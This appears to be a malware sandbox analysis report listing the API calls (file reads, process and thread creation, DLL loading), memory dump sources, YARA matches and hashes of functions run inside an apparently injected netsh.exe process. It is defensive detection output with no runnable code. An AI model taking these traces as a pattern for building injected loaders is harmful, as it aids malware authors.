                          0x0107fe19
                          0x0107fe19
                          0x0107fe19
                          0x0107fe20
                          0x0107fe21
                          0x0107fe22
                          0x0107fe25
                          0x0107fe40

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0107FDFA
                          Strings
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0107FE2B
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0107FE01
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                          • API String ID: 885266447-3903918235
                          • Opcode ID: 783ee843891b6faa291fa7dca412ef56f340233dc52d20569087e1e14c44ab77
                          • Instruction ID: f31177dda8a7ad685a5369ec7a19e25fdb2cef152321fea1928542c7daaf626c
                          • Opcode Fuzzy Hash: 783ee843891b6faa291fa7dca412ef56f340233dc52d20569087e1e14c44ab77
                          • Instruction Fuzzy Hash: 00F0F632600602BFEA201A55DC02F67BF6AFB94B30F140315F668561D1DAA2F820D6F5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Analysis Process: netsh.exe PID: 6904 Parent PID: 3440 netsh.exeCOMMON

                          Executed Functions

                          Function 02DD85E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02DD3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DD3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02DD862D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                          • Instruction ID: 0fe360bbb1af3487891d010561a523d4884ddbdf0dce8d998af98cf3268b83e2
                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                          • Instruction Fuzzy Hash: CDF0BDB2204208ABCB08CF88DC94EEB77ADAF8C754F158248FA0D97240C630E811CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD85DA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02DD3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DD3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02DD862D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: 376b76feb21824fa48789a8f80c8a437da893c14e663adeb08cbf43f4dd1fed7
                          • Instruction ID: 5723dd8020f2b4ee1a6eaf2265fbac9e88f0b68f42e847dd6ede0ec9c0344139
                          • Opcode Fuzzy Hash: 376b76feb21824fa48789a8f80c8a437da893c14e663adeb08cbf43f4dd1fed7
                          • Instruction Fuzzy Hash: 78F014B6204188ABCB08CF98D884CEB77A9EF8C350B15864DFA0D93202C634E851CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD870C, Relevance: 3.0, APIs: 2, Instructions: 45nativefileCOMMON
                          Download Yara Rule
                          APIs
                          • NtReadFile.NTDLL(02DD3D72,5E972F65,FFFFFFFF,02DD3A31,?,?,02DD3D72,?,02DD3A31,FFFFFFFF,5E972F65,02DD3D72,?,00000000), ref: 02DD86D5
                          • NtClose.NTDLL(02DD3D50,?,?,02DD3D50,00000000,FFFFFFFF), ref: 02DD8735
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CloseFileRead
                          • String ID:
                          • API String ID: 752142053-0
                          • Opcode ID: 0d24d278059620e815b43ad25f047fdd73d2e6c9f4eeb68bd90787b8b3011962
                          • Instruction ID: 8ad2a4f143c01b3c3c10d7ccafb2bb2762559d67dc1d6ed68dd57959c39b4813
                          • Opcode Fuzzy Hash: 0d24d278059620e815b43ad25f047fdd73d2e6c9f4eeb68bd90787b8b3011962
                          • Instruction Fuzzy Hash: ECF019B6204108ABC714EF98DC84DEB77ADEF8C750F148658FA1897201C630EA118BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD8690, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtReadFile.NTDLL(02DD3D72,5E972F65,FFFFFFFF,02DD3A31,?,?,02DD3D72,?,02DD3A31,FFFFFFFF,5E972F65,02DD3D72,?,00000000), ref: 02DD86D5
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                          • Instruction ID: 7c1166e39135a5d0b113aba33cd3fc414f0d6e044a37683040261778bf6ec60b
                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                          • Instruction Fuzzy Hash: CAF0A4B2200208ABCB14DF89DC94EEB77ADEF8C754F158248BA1D97241D630E911CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD8710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtClose.NTDLL(02DD3D50,?,?,02DD3D50,00000000,FFFFFFFF), ref: 02DD8735
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                          • Instruction ID: 47312583a06e13d057db28790eb6cea0be4b911d63f980f358dcf14ded3ab009
                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                          • Instruction Fuzzy Hash: 5AD01776200214ABD710EBD8CC89EE77BADEF48760F154499BA189B242C530FA00CAE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 03809A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6741f413dcbb8811a00149df40fd7fb38c384f1a4481e653d767683a312df4ab
                          • Instruction ID: ab9d54a49a59b4abe972bfbd43d2950de35584a9ddd00727bc05e93b4410a482
                          • Opcode Fuzzy Hash: 6741f413dcbb8811a00149df40fd7fb38c384f1a4481e653d767683a312df4ab
                          • Instruction Fuzzy Hash: 2090026121185442D200A5A94C14F17040997D0343F51C555A1148664CCA5588796561
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 038099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: d09eaf6ddacb1a807efae09c3c5e7859cef998757ae1b1768fbe0757183c5ff0
                          • Instruction ID: 0ab46c001ee3f149fa2c7aa4aaf5b2d443abec2218d5c885702d5f7f2844dfea
                          • Opcode Fuzzy Hash: d09eaf6ddacb1a807efae09c3c5e7859cef998757ae1b1768fbe0757183c5ff0
                          • Instruction Fuzzy Hash: 869002A134105842D100A1994414F160409D7E1341F51C455E2058664D8759CC6A7166
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 03809910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 9274681e399034cfa754c0c07b750f6ab9a6ae547bcc1f20a1f6f74dd23c2fc1
                          • Instruction ID: c000a135aded9b6d623a744c4e205e408d5a781b40a81f34f3b5c25437e1be5b
                          • Opcode Fuzzy Hash: 9274681e399034cfa754c0c07b750f6ab9a6ae547bcc1f20a1f6f74dd23c2fc1
                          • Instruction Fuzzy Hash: 619002B120105802D140B1994404B56040997D0341F51C451A6058664E87998DED76A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 03809840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 7f1f20f30a5ec174343167962756e8e0209a2b445154af7d0965530d6b6a4c3e
                          • Instruction ID: 1b53f735bbe321a3808b729d704f083b4a195d464584ea72115d4ffb9e766619
                          • Opcode Fuzzy Hash: 7f1f20f30a5ec174343167962756e8e0209a2b445154af7d0965530d6b6a4c3e
                          • Instruction Fuzzy Hash: 52900261242095525545F1994404A17440AA7E0281791C452A2408A60C8666986EE661
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 03809860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 55fc7f5ccd36039a85507198d9cf2df27b0adc7a5168e2378cc1efc918416441
                          • Instruction ID: 707c54b8ecb28b28836f69db4f6f6407f5d3cda7f8506d0c1fca6f825f59b634
                          • Opcode Fuzzy Hash: 55fc7f5ccd36039a85507198d9cf2df27b0adc7a5168e2378cc1efc918416441
                          • Instruction Fuzzy Hash: C990027120105813D111A1994504B17040D97D0281F91C852A1418668D9796896AB161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 03809780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: fe7ce575183fc596203c0dd70b1905f1b1d9b074f1bccaaf9aa518d7cf16732b
                          • Instruction ID: 1bc060fa0c64f0542d151c8b5f8ee5b4dc343904ca5f4ba02577e5504774e7c4
                          • Opcode Fuzzy Hash: fe7ce575183fc596203c0dd70b1905f1b1d9b074f1bccaaf9aa518d7cf16732b
                          • Instruction Fuzzy Hash: B490026921305402D180B1995408B1A040997D1242F91D855A1009668CCA55887D6361
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 03809FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: bb5842b683d8a6c7a622e55436e0c12adaadfdf30ce1713a0f5c852782daab2b
                          • Instruction ID: d799bc0c470dc0b9f88d801a89b0d4ce5c9f1c55982e2471a411198bb596e879
                          • Opcode Fuzzy Hash: bb5842b683d8a6c7a622e55436e0c12adaadfdf30ce1713a0f5c852782daab2b
                          • Instruction Fuzzy Hash: 8890027131119802D110A1998404B16040997D1241F51C851A1818668D87D588A97162
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 03809710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 70693134a63729e8e80c6d2edb7de56566c85404073b44e39e858a42f6d157f2
                          • Instruction ID: cb538d5faaf988a477ea7407a519ab04c876ebdf382ebaff2fd04f6083780985
                          • Opcode Fuzzy Hash: 70693134a63729e8e80c6d2edb7de56566c85404073b44e39e858a42f6d157f2
                          • Instruction Fuzzy Hash: B990027120105802D100A5D95408B56040997E0341F51D451A6018665EC7A588A97171
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 038096D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 9f28d9388defb32feb957cafd1fd3d9fecc4903665ca2e5b9b1969d0a3da39ba
                          • Instruction ID: 2ba1b55396f415f28f5be31a96ca0ac624a6a8ecd62e75173e0a21340d5c5a01
                          • Opcode Fuzzy Hash: 9f28d9388defb32feb957cafd1fd3d9fecc4903665ca2e5b9b1969d0a3da39ba
                          • Instruction Fuzzy Hash: A790027120105C42D100A1994404F56040997E0341F51C456A1118764D8755C8697561
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 038096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 625b28c6c1e46047459aa513af53b2fb6e02e635fd1335a363099d15582b79d1
                          • Instruction ID: b4229797b5e071ee9265592bbec89b5c42883025ad061f727ff4cfe558fda0d1
                          • Opcode Fuzzy Hash: 625b28c6c1e46047459aa513af53b2fb6e02e635fd1335a363099d15582b79d1
                          • Instruction Fuzzy Hash: 019002712010DC02D110A1998404B5A040997D0341F55C851A5418768D87D588A97161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 038095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: e2c75319a498780b048efbc27df1c008c4e486f138e23fce4e6152edda6688a5
                          • Instruction ID: 6815a63fbbe4233078829d03c5710b8dc7da69a1efc1804a07f569ab752ec62a
                          • Opcode Fuzzy Hash: e2c75319a498780b048efbc27df1c008c4e486f138e23fce4e6152edda6688a5
                          • Instruction Fuzzy Hash: CE9002A1202054034105B1994414B26440E97E0241B51C461E20086A0DC66588A97165
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 03809540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: cec919e79120c9becad1b127475683b2ed1a4833447a755e0251bd717184e59e
                          • Instruction ID: afea4b8adb8334083aa39ce808f0ba95863ae2fb8be264fa853c9761cb5dbc49
                          • Opcode Fuzzy Hash: cec919e79120c9becad1b127475683b2ed1a4833447a755e0251bd717184e59e
                          • Instruction Fuzzy Hash: EA900265211054030105E5990704A17044A97D5391351C461F2009660CD76188796161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD7300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNELBASE(000007D0), ref: 02DD73A8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: net.dll$wininet.dll
                          • API String ID: 3472027048-1269752229
                          • Opcode ID: 867181aae45a387c7611d48cabb922095bf07d23469bb2a71db3145e38100b66
                          • Instruction ID: c032a9e79fd946dfa164af62fd39f7adb4b69da3dd635a48b3538c499ee4d95c
                          • Opcode Fuzzy Hash: 867181aae45a387c7611d48cabb922095bf07d23469bb2a71db3145e38100b66
                          • Instruction Fuzzy Hash: EF316EB6501A00ABD725EF64C8A0FA7B7B9EF88700F10855DFA595B245D730A945CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD72F7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNELBASE(000007D0), ref: 02DD73A8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: net.dll$wininet.dll
                          • API String ID: 3472027048-1269752229
                          • Opcode ID: a3160a053959fe0791a4b080108bc42a49f0e9d4b4b7e82d6b0fdd0ef45a4263
                          • Instruction ID: 6a6ab2b0939f976a8c044772da51d85ecf83c189bd2ec91d6bb38a90fe235a8a
                          • Opcode Fuzzy Hash: a3160a053959fe0791a4b080108bc42a49f0e9d4b4b7e82d6b0fdd0ef45a4263
                          • Instruction Fuzzy Hash: 2B21D576901A00ABD711EF64C8A0FABBBB5FF88700F10815DFA195B345D330E845CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD8923, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DC3B93), ref: 02DD891D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: .z`
                          • API String ID: 3298025750-1441809116
                          • Opcode ID: d62e800b08c4cc61464d52e6078d3c6050bf1d99bc0f7649bca3bd97df8f6a16
                          • Instruction ID: 752e8a2bd38f763e439223290fd4c1cc17ec9e71d8e5eca97facf2e9530549ed
                          • Opcode Fuzzy Hash: d62e800b08c4cc61464d52e6078d3c6050bf1d99bc0f7649bca3bd97df8f6a16
                          • Instruction Fuzzy Hash: 70019E762046046BD722DF98DC95ED77768EF847A0F044095F94C9B342D630EE10CAF1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD88E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DC3B93), ref: 02DD891D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: .z`
                          • API String ID: 3298025750-1441809116
                          • Opcode ID: 8aaa531ffc0db079491aec3f70eed164a8d3963a6421d82781efd33be8240a16
                          • Instruction ID: 0fef18ad4931a2164a11649bab8d7f09d3461900a17ff2834bcfa20b1b58c1a9
                          • Opcode Fuzzy Hash: 8aaa531ffc0db079491aec3f70eed164a8d3963a6421d82781efd33be8240a16
                          • Instruction Fuzzy Hash: 9BF0E2B62046146BCB15DF98DC48EEB779CEF88650F154595F90CAB241C631E910CAF1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD88F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DC3B93), ref: 02DD891D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: .z`
                          • API String ID: 3298025750-1441809116
                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                          • Instruction ID: 8d2a41694837887a845761df5b38f3fd818c1db9a712c60f669b873a982ae35c
                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                          • Instruction Fuzzy Hash: 95E012B1200208ABDB18EF99CC48EA777ADEF88750F018558FA085B241C631E910CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DC7280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DC72DA
                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DC72FB
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID:
                          • API String ID: 1836367815-0
                          • Opcode ID: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                          • Instruction ID: 02f689d638769298ffc7457882837d603fbb03a1740b3e5f81bdf5644c6b3e0a
                          • Opcode Fuzzy Hash: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                          • Instruction Fuzzy Hash: C001A731A8022AB7E721A6949C42FFEB76D9B40B51F144118FF04BB2C4EAD46D058AF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DC9B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DC9BB2
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction ID: 7be03d780a86099dfc09d055bd9ec017c385c29945d677d3ef617578e5349881
                          • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction Fuzzy Hash: 37011EB5D0020EBBDF10DAE4DC81FEEB379DB54708F104199A90897284F631EB14CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD89B9, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DD89B4
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateInternalProcess
                          • String ID:
                          • API String ID: 2186235152-0
                          • Opcode ID: c1ebe75da85cb51ebaa87378d775be1eb7b29cfb1eb12bd5ebb548284419c4f7
                          • Instruction ID: a7b34fd588468ba745c04ad9f52e11b6561780406f4324b7e40daea4f51ec0a1
                          • Opcode Fuzzy Hash: c1ebe75da85cb51ebaa87378d775be1eb7b29cfb1eb12bd5ebb548284419c4f7
                          • Instruction Fuzzy Hash: 00F0C9B6200209ABDB14DF99DC84EEB77ADEF88750F108559FA0C97241D630E911CBB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD8960, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DD89B4
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateInternalProcess
                          • String ID:
                          • API String ID: 2186235152-0
                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                          • Instruction ID: a3e16d2cc9b1c5ef963305d5c337b5b702ff5a0a0610b2074d961a1b07724175
                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                          • Instruction Fuzzy Hash: 5501AFB2214108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD7430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DCCCF0,?,?), ref: 02DD746C
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                          • Instruction ID: 54303434b90ed91461814824764d52c9f1be8737e52c567fb87aa5fe2907f023
                          • Opcode Fuzzy Hash: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                          • Instruction Fuzzy Hash: 06E092333807043AE73065AD9C02FA7B39DCB81B24F540066FA4DEB2C0D595F80146E5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD8A43, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
